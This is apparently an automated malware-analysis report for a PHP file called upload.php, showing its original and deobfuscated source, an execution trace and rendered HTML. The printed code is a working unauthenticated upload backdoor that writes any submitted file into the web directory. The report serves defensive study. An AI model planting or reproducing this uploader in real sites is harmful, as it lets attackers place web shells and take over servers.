PHP Malware Analysis

upload.php

md5: 02f8f6485eb530a9ef518b8c128ad314

Jump to: 

Screenshot
Attributes
Files

Input

Deobfuscated PHP code
<style type="text/css">
body {
  color: #33ff33;
  background-color: black;
  font-weight: inherit;
}
h1,h2{
  background-color: #4D4D4D;
  color: #000000;
  text-align: center;
}
h3,h4,h5{
  color: silver;
  text-align: center;
}
</style>
<b><br>
<h1> Uploading </h1>
<br><br>
<center>
<font color:"blue">
<span style="font-family: monospace;">
<span style="color: rgb(255, 255, 255);">
<br><br>
<font color="black"></font>
<br></b> <?php 
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\">\n<input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\">\n</form>";
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>Archivo subido!</b><br><br>";
    } else {
        echo "<b>Upload Fail!</b><br><br></font>";
    }
}
Execution traces
data/traces/02f8f6485eb530a9ef518b8c128ad314_trace-1676245429.5097.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:44:15.407557]
1	0	1	0.000230	393528
1	3	0	0.000340	396240	{main}	1		/var/www/html/uploads/upload.php	0	0
1	3	1	0.000382	396240
			0.000537	314240
TRACE END   [2023-02-12 21:44:15.407909]


Generated HTML code
<html><head><style type="text/css">
body {
  color: #33ff33;
  background-color: black;
  font-weight: inherit;
}
h1,h2{
  background-color: #4D4D4D;
  color: #000000;
  text-align: center;
}
h3,h4,h5{
  color: silver;
  text-align: center;
}
</style>
</head><body><b><br>
<h1> Uploading </h1>
<br><br>
</b><center><b>
<font color:"blue"="">
<span style="font-family: monospace;">
<span style="color: rgb(255, 255, 255);">
<br><br>
<font color="black"></font>
<br></span></span></font></b><font color:"blue"=""> <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50">
<input name="_upl" type="submit" id="_upl" value="Upload">
</form></font></center></body></html>
Original PHP code
<style type="text/css">
body {
  color: #33ff33;
  background-color: black;
  font-weight: inherit;
}
h1,h2{
  background-color: #4D4D4D;
  color: #000000;
  text-align: center;
}
h3,h4,h5{
  color: silver;
  text-align: center;
}
</style>
<b><br>
<h1> Uploading </h1>
<br><br>
<center>
<font color:"blue">
<span style="font-family: monospace;">
<span style="color: rgb(255, 255, 255);">
<br><br>
<font color="black"></font>
<br></b> <?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50">
<input name="_upl" type="submit" id="_upl" value="Upload">
</form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{
echo '<b>Archivo subido!</b><br><br>';
}
else
{
echo '<b>Upload Fail!</b><br><br></font>';
}
}

?>